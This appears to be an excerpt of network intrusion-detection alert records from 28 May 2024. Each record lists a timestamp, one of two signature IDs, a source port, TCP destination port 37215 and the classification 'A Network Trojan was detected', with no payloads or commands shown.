          Timestamp:05/28/24-14:47:02.561068
          SID:2829579
          Source Port:34868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.414765
          SID:2835222
          Source Port:33476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.721995
          SID:2829579
          Source Port:36032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.958634
          SID:2835222
          Source Port:40030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.270329
          SID:2835222
          Source Port:55782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.228317
          SID:2835222
          Source Port:43814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.403160
          SID:2835222
          Source Port:34932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.631825
          SID:2835222
          Source Port:53320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269203
          SID:2835222
          Source Port:58378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.294647
          SID:2835222
          Source Port:39308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.622152
          SID:2829579
          Source Port:44282
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.547509
          SID:2835222
          Source Port:36362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.962864
          SID:2835222
          Source Port:45936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.549483
          SID:2835222
          Source Port:47794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.611886
          SID:2829579
          Source Port:45590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.403349
          SID:2835222
          Source Port:43290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.486492
          SID:2835222
          Source Port:45078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474932
          SID:2835222
          Source Port:57274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.887831
          SID:2829579
          Source Port:40444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.978880
          SID:2835222
          Source Port:38188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922413
          SID:2835222
          Source Port:56384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.205636
          SID:2829579
          Source Port:42290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.492864
          SID:2829579
          Source Port:54578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.921338
          SID:2835222
          Source Port:53436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291556
          SID:2829579
          Source Port:43808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.985182
          SID:2835222
          Source Port:55242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.918883
          SID:2829579
          Source Port:48318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.162127
          SID:2835222
          Source Port:58514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.239320
          SID:2835222
          Source Port:37028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.483145
          SID:2835222
          Source Port:46312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.807538
          SID:2829579
          Source Port:53724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.605113
          SID:2835222
          Source Port:48024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594505
          SID:2829579
          Source Port:43094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.217792
          SID:2829579
          Source Port:33402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291663
          SID:2829579
          Source Port:44598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.020474
          SID:2835222
          Source Port:43864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.889191
          SID:2835222
          Source Port:34964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.188117
          SID:2829579
          Source Port:51930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.332693
          SID:2835222
          Source Port:40972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923548
          SID:2829579
          Source Port:50492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.162228
          SID:2835222
          Source Port:42302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.484298
          SID:2835222
          Source Port:57474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.997099
          SID:2835222
          Source Port:49250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794209
          SID:2829579
          Source Port:54838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.292879
          SID:2835222
          Source Port:45884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591391
          SID:2829579
          Source Port:55624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.283484
          SID:2835222
          Source Port:52622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322048
          SID:2829579
          Source Port:46316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.267243
          SID:2829579
          Source Port:45936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.341351
          SID:2835222
          Source Port:57996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465135
          SID:2835222
          Source Port:40970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.177207
          SID:2835222
          Source Port:46366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.189068
          SID:2835222
          Source Port:48750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.778407
          SID:2835222
          Source Port:47594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.679755
          SID:2835222
          Source Port:58478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.334169
          SID:2829579
          Source Port:58312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.630812
          SID:2835222
          Source Port:47342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939635
          SID:2829579
          Source Port:59394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.941223
          SID:2829579
          Source Port:36008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.042283
          SID:2835222
          Source Port:57240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.298297
          SID:2835222
          Source Port:41376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178925
          SID:2829579
          Source Port:41172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.879109
          SID:2829579
          Source Port:53252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943295
          SID:2835222
          Source Port:35686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943191
          SID:2829579
          Source Port:47826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.602066
          SID:2829579
          Source Port:49076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.244942
          SID:2835222
          Source Port:35690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.230286
          SID:2835222
          Source Port:33358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.594384
          SID:2835222
          Source Port:49196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.630727
          SID:2829579
          Source Port:42938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.983744
          SID:2829579
          Source Port:48596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711094
          SID:2835222
          Source Port:56738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.547532
          SID:2829579
          Source Port:48922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.477871
          SID:2829579
          Source Port:43944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.550352
          SID:2829579
          Source Port:33280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943240
          SID:2829579
          Source Port:43566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.196198
          SID:2829579
          Source Port:44554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269736
          SID:2829579
          Source Port:45674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.512660
          SID:2835222
          Source Port:41876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.225765
          SID:2829579
          Source Port:42856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.424509
          SID:2835222
          Source Port:51472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.804420
          SID:2829579
          Source Port:38734
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.093555
          SID:2829579
          Source Port:46146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272794
          SID:2835222
          Source Port:33518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.992335
          SID:2829579
          Source Port:40256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.710651
          SID:2829579
          Source Port:60336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.222420
          SID:2835222
          Source Port:56482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.562192
          SID:2829579
          Source Port:52280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922618
          SID:2835222
          Source Port:38856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.487796
          SID:2835222
          Source Port:57060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.338011
          SID:2829579
          Source Port:34970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.979324
          SID:2829579
          Source Port:44698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.626682
          SID:2829579
          Source Port:53304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.714495
          SID:2835222
          Source Port:60440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594375
          SID:2829579
          Source Port:50932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.819824
          SID:2835222
          Source Port:51946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.486720
          SID:2829579
          Source Port:38804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.341053
          SID:2829579
          Source Port:54648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472706
          SID:2835222
          Source Port:55076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.560461
          SID:2829579
          Source Port:44364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.684310
          SID:2835222
          Source Port:39556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.160505
          SID:2829579
          Source Port:42902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.436074
          SID:2835222
          Source Port:59476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.547662
          SID:2829579
          Source Port:33344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.035520
          SID:2829579
          Source Port:48990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529000
          SID:2829579
          Source Port:44306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.630530
          SID:2829579
          Source Port:37798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.481148
          SID:2829579
          Source Port:50940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.117954
          SID:2835222
          Source Port:46144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.280913
          SID:2829579
          Source Port:38868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.978121
          SID:2835222
          Source Port:33702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.338320
          SID:2835222
          Source Port:54086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.284299
          SID:2835222
          Source Port:37214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.945493
          SID:2829579
          Source Port:38170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.019675
          SID:2829579
          Source Port:41508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.770661
          SID:2829579
          Source Port:37328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.061401
          SID:2829579
          Source Port:60954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.930931
          SID:2829579
          Source Port:39456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399835
          SID:2829579
          Source Port:35994
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.766143
          SID:2829579
          Source Port:37528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.225188
          SID:2829579
          Source Port:52508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.875979
          SID:2829579
          Source Port:32952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.771595
          SID:2829579
          Source Port:35062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543318
          SID:2835222
          Source Port:37494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267787
          SID:2835222
          Source Port:33692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.140260
          SID:2829579
          Source Port:44032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322403
          SID:2835222
          Source Port:43914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.284972
          SID:2835222
          Source Port:44152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708521
          SID:2835222
          Source Port:39548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543543
          SID:2829579
          Source Port:45146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.265812
          SID:2835222
          Source Port:59620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202316
          SID:2829579
          Source Port:49670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.704957
          SID:2835222
          Source Port:42842
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597233
          SID:2829579
          Source Port:51572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528912
          SID:2829579
          Source Port:52616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.211885
          SID:2829579
          Source Port:54902
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.271410
          SID:2829579
          Source Port:38198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.592993
          SID:2829579
          Source Port:37632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890193
          SID:2835222
          Source Port:54676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326583
          SID:2829579
          Source Port:52492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.745941
          SID:2829579
          Source Port:35564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878646
          SID:2829579
          Source Port:34362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.415975
          SID:2835222
          Source Port:50402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.150973
          SID:2835222
          Source Port:52770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.484765
          SID:2835222
          Source Port:36266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.607553
          SID:2829579
          Source Port:55968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.138083
          SID:2835222
          Source Port:59900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466085
          SID:2829579
          Source Port:34184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.796255
          SID:2829579
          Source Port:46178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.039898
          SID:2835222
          Source Port:56038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.548588
          SID:2835222
          Source Port:35686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.267704
          SID:2835222
          Source Port:44190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.298040
          SID:2835222
          Source Port:42478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476475
          SID:2829579
          Source Port:35044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.190695
          SID:2835222
          Source Port:35732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.041967
          SID:2829579
          Source Port:44218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326339
          SID:2835222
          Source Port:37596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543250
          SID:2835222
          Source Port:41018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214671
          SID:2835222
          Source Port:51048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473353
          SID:2835222
          Source Port:55496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.141706
          SID:2829579
          Source Port:58398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842098
          SID:2835222
          Source Port:35480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.923089
          SID:2835222
          Source Port:36720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.237618
          SID:2835222
          Source Port:59594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.183836
          SID:2835222
          Source Port:39174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847731
          SID:2829579
          Source Port:38040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.339710
          SID:2829579
          Source Port:54248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.201227
          SID:2835222
          Source Port:57478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.889202
          SID:2835222
          Source Port:44394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299989
          SID:2835222
          Source Port:47074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.481158
          SID:2829579
          Source Port:42780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116902
          SID:2835222
          Source Port:42894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.371449
          SID:2835222
          Source Port:54900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.973212
          SID:2829579
          Source Port:59584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.892914
          SID:2835222
          Source Port:52744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.756373
          SID:2829579
          Source Port:38236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.210657
          SID:2829579
          Source Port:50148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.685481
          SID:2829579
          Source Port:46676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.163757
          SID:2829579
          Source Port:37820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.114095
          SID:2835222
          Source Port:42012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.714394
          SID:2835222
          Source Port:47680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.667681
          SID:2835222
          Source Port:48124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206780
          SID:2835222
          Source Port:54180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195566
          SID:2835222
          Source Port:56398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.241084
          SID:2829579
          Source Port:44558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.270972
          SID:2829579
          Source Port:47030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529096
          SID:2835222
          Source Port:40942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399648
          SID:2829579
          Source Port:44798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.273456
          SID:2835222
          Source Port:59380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474168
          SID:2829579
          Source Port:52822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794220
          SID:2829579
          Source Port:43694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764718
          SID:2835222
          Source Port:43428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.807219
          SID:2835222
          Source Port:49006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.938661
          SID:2829579
          Source Port:34150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664672
          SID:2835222
          Source Port:53888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.474758
          SID:2835222
          Source Port:44674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.075716
          SID:2829579
          Source Port:51292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.887003
